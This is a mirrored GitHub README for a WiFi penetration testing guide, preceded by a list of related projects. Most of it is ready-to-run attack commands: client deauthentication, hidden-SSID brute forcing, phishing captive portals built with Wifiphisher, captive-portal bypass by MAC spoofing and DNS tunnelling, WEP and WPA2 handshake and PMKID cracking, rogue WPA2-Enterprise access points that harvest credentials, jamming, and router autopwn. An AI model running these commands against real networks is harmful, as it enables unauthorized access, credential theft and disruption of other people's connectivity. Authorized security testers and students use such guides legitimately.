All Projects → ricardojoserf → wifi-pentesting-guide

ricardojoserf / wifi-pentesting-guide

Licence: other
WiFi Penetration Testing Guide

Programming Languages

python
139335 projects - #7 most used programming language
shell
77523 projects

Projects that are alternatives of or similar to wifi-pentesting-guide

Wifi-Cracker
Wifi Cracking
Stars: ✭ 128 (+21.9%)
Mutual labels:  wifi-network, wifi-security, wifi-hacking
wifivoid
Ruby script for continuously jam all wifi clients and access points within range
Stars: ✭ 91 (-13.33%)
Mutual labels:  wifi, wifi-security, wifi-hacking
conti-pentester-guide-leak
Leaked pentesting manuals given to Conti ransomware crooks
Stars: ✭ 772 (+635.24%)
Mutual labels:  offensive-security, pentest-scripts, pentesting-tools
Whoishere.py
WIFI Client Detection - Identify people by assigning a name to a device performing a wireless probe request.
Stars: ✭ 182 (+73.33%)
Mutual labels:  wifi, wifi-security
Wifi Password
Quickly fetch your WiFi password and if needed, generate a QR code of your WiFi to allow phones to easily connect
Stars: ✭ 2,325 (+2114.29%)
Mutual labels:  wifi, wifi-network
Wifi Passview
An open source batch script based WiFi Passview for Windows!
Stars: ✭ 157 (+49.52%)
Mutual labels:  wifi, wifi-security
Ska
Simple Karma Attack
Stars: ✭ 55 (-47.62%)
Mutual labels:  wifi, pentest-scripts
Auto-Besside-Capturer
Capture WPA handshakes, using besside-ng. Auto upload to http://wpa-sec.stanev.org for cracking the password.
Stars: ✭ 28 (-73.33%)
Mutual labels:  wifi, wifi-security
Aircrack Ng
WiFi security auditing tools suite
Stars: ✭ 2,690 (+2461.9%)
Mutual labels:  wifi, wifi-security
wifisdk
Free WiFi Connect SDK
Stars: ✭ 28 (-73.33%)
Mutual labels:  wifi, wifi-network
Some Pentesters SecurityResearchers RedTeamers
Some Pentesters, Security Researchers, Red Teamers which i learned from them a lot...
Stars: ✭ 60 (-42.86%)
Mutual labels:  offensive-security, pentesting-tools
Easy-HotSpot
Easy HotSpot is a super easy WiFi hotspot user management utility for Mikrotik RouterOS based Router devices. Voucher printing in 6 ready made templates are available. Can be installed in any PHP/MySql enabled servers locally or in Internet web servers. Uses the PHP PEAR2 API Client by boenrobot.
Stars: ✭ 45 (-57.14%)
Mutual labels:  wifi, wifi-network
Connectivity
🌐 Makes Internet connectivity detection more robust by detecting Wi-Fi networks without Internet access.
Stars: ✭ 1,476 (+1305.71%)
Mutual labels:  wifi, wifi-network
Bettercap
The Swiss Army knife for 802.11, BLE, IPv4 and IPv6 networks reconnaissance and MITM attacks.
Stars: ✭ 10,735 (+10123.81%)
Mutual labels:  wifi, wifi-security
Probequest
Toolkit for Playing with Wi-Fi Probe Requests
Stars: ✭ 167 (+59.05%)
Mutual labels:  wifi, wifi-security
Hcxtools
Portable (that doesn't include proprietary/commercial operating systems) solution for conversion of cap/pcap/pcapng (gz compressed) WiFi dump files to hashcat formats (recommended by hashcat) and to John the Ripper formats. hcx: h = hash, c = convert and calculate candidates, x = different hashtypes
Stars: ✭ 1,121 (+967.62%)
Mutual labels:  wifi, wifi-security
Gopher
C# tool to discover low hanging fruits
Stars: ✭ 73 (-30.48%)
Mutual labels:  offensive-security, pentesting-tools
Catchme
CatchME - WiFi Fun Box "Having Fun with ESP8266"
Stars: ✭ 28 (-73.33%)
Mutual labels:  wifi, wifi-security
Hcxdumptool
Small tool to capture packets from wlan devices.
Stars: ✭ 945 (+800%)
Mutual labels:  wifi, wifi-security
wifi-penetration-testing-cheat-sheet
Work in progress...
Stars: ✭ 149 (+41.9%)
Mutual labels:  wifi, offensive-security

WiFi Penetration Testing Guide

Index

  1. Basic commands

  2. Open networks

    2.1. Captive portals

    2.2. Man in the Middle attack

  3. WEP cracking

    3.1. No clients

  4. WPA2-PSK cracking

    4.1. Cracking the 4-way-handshake

    4.2. PMKID attack

  5. WPA2-Enterprise

    5.1. Fake Access Points

    5.2. Brute force

    5.3. EAP methods supported

  6. Other attacks

    6.1. Krack Attack

    6.2. OSINT

    6.3. Wifi Jamming

    6.4. Other frameworks

  7. Post-exploitation

    7.1. Attacking the router

    7.2. Types of scanners

    7.3. Spoofing



1. Basic commands

Set environment variable

VARIABLE=value

Check interface mode

iwconfig $IFACE

Check interface status

ifconfig $IFACE

Set monitor mode

airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up

List networks

  1. Set monitor mode

  2. Run Airodump-ng-ng

airodump-ng $IFACE -c $CHANNEL -e $ESSID

Deauthentication

  1. Only one client
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
  1. An Access Point (= all the clients in the AP)
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE

Get hidden SSID with clients

  1. List networks

List the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.

  1. Deauthenticate

In another terminal, deauthenticate a client or all of them. When Airodump-ng captures a handshake from this network, the name or ESSID will appear in the first terminal:

aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE

Get hidden SSID without clients

  1. List networks

List the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.

2.a. Execute a dictionary attack

mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH

2.b. Or execute a bruteforce attack

mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET

For the character set it is possible to use l (lowercase letters), u (uppercase letters), n (numbers), c (lowercase+uppercase), m (lowercase+uppercase+numbers) or a (all printed).



2. Open networks

2.1. Captive portals

2.1.1. Fake captive portals

  1. Clone a website using HTTrack

  2. Install Wifiphiser. Add the HTTrack result in a new folder in wifiphisher/data/phishing-pages/new_page/html and a configuration file in wifiphisher/data/phishing-pages/new_page/config.ini.

  3. Recompile the project using python setup.py install or the binary in bin.

  4. This command works correctly in the latest Kali release after installing hostapd:

cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE

2.1.2. Bypass 1: MAC spoofing

The first method to bypass a captive portal is to change your MAC address to one of an already authenticated user

  1. Scan the network and get the list of IP and MAC addresses. You can use:
  • nmap

  • A custom script like this (Bash) or this (Python)

  1. Change your IP and MAC addresses. You can use:
  • macchanger

  • A custom script like this(Bash)

Also, you can use scripts to automate the process like:


2.1.3. Bypass 2: DNS tunnelling

A second method is creating a DNS tunnel. For this, it is necessary to have an accessible DNS server of your own. You can use this method to bypass the captive portal and get "free" Wifi in hotel, airports...

  1. Check the domain names are resolved:
nslookup example.com
  1. Create 2 DNS records (in Digital ocean, Afraid.org...):
  • One "A record": dns.$DOMAIN pointing to the $SERVER_IP (Example: dns.domain.com 139.59.172.117)

  • One "NS record": hack.$DOMAIN pointing to dns.$DOMAIN (Example: hack.domain.com dns.domain.com)

  1. Execution in the server
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
  1. Check if it works correctly in here

  2. Execution in the client

iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
  1. Create the tunnel
ssh -D 8080 [email protected]

2.2. Man in the Middle attack

Once you are in the network, you can test if it is vulnerable to Man in the Middle attacks.

  1. ARP Spoofing attack using Ettercap

  2. Sniff the traffic using Wireshark or TCPdump

  3. Analyze the traffic using PCredz (Linux) or Network Miner (Windows)



3. WEP cracking

  1. Start capture
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. Accelerate the IV capture using Fake authentication + Arp Request Replay Attack + Deauthenticate user. Stop Airodump at ~100.000 different IVs
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. Crack the password using Aircrack-ng
aircrack-ng $PCAP_FILE


4. WPA2-PSK cracking

4.1. Cracking the 4-way-handshake

  1. Start capture
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. Deauthenticate an user. Stop airodump capture when you see a message 'WPA handshake: $MAC'
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. Option 1: Crack the handshake using Aircrack-ng
aircrack-ng -w $WORDLIST capture.cap

You can get wordlists from here.

  1. Option 2: Crack the handshake using Pyrit
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db

4.2. PMKID attack

You can use this script or follow these steps:

  1. Install Hcxdumptool and Hcxtool (you can use this script).

  2. Stop Network Manager

airmon-ng check kill

3a. If you want to attack all the networks

TO DO

3b. If you want to attack a specific MAC address

  • Create a text file ($FILTER_FILE) and add the MAC address without ":". You can use sed and redirect the output to a file:
echo $MAC | sed 's/://g' > $FILTER_FILE
  • Capture PMKID
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
  1. Create $HASH_FILE
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE

The structure of each line is: PMKID * ROUTER MAC * STATION * ESSID (check at: https://www.rapidtables.com/convert/number/hex-to-ascii.html)

  1. Crack it using Hashcat (option 16800)
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force


5. WPA2-Enterprise

5.1 Fake Access Points

Virtual machines download

Operative system Platform Credentials Size Link
Ubuntu 16.04.5 VMware ricardojoserf:wifi 3.25 GB MEGA
Kali 2019.1 VMware root:wifi 4.99 GB MEGA
Ubuntu 16.04.5 VirtualBox ricardojoserf:wifi 3.18 GB MEGA
Kali 2019.1 VirtualBox root:wifi 5.56 GB MEGA

Local installation

In case you do not want to use the virtual machine, you can install everything using:

git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack

cd WPA_Enterprise_Attack && sudo sh install.sh

Hostapd & Freeradius-wpe

Start the Access Point using:

sh freeradius_wpe_init.sh $AP_NAME $INTERFACE

When a client connects, read logs with:

sh freeradius_wpe_read.sh

Hostapd-wpe

sh hostapd_wpe_init.sh $AP_NAME $INTERFACE

5.2 Brute force

5.3 EAP methods supported

Find supported EAP methods



6. Other attacks

6.1. Krack Attack

6.2. OSINT

6.3. Wifi Jamming

  • Wifijammer - This program can send deauthentication packets to both APs and clients.

An example to deauthenticate all the devices except a Fake Acess Point:

sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC

6.4. Other frameworks

Linux:

Windows:



7. Post-exploitation

Once you are connected to the network

7.1. Attacking the router

  • Routersploit - Exploitation Framework for Embedded Devices - Test "use scanners/autopwn"

7.2. Types of scanners

  • Nmap/Zenmap - Security Scanner, Port Scanner, & Network Exploration Tool

  • Masscan - The faster version of nmap (it can break things, so be careful)

  • Netdiscover - ARP sniffing. Very useful if the networks are very well segmented

7.3. Spoofing

  • Ettercap - Check if you can do a MitM attack and sniff all the traffic in the network
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].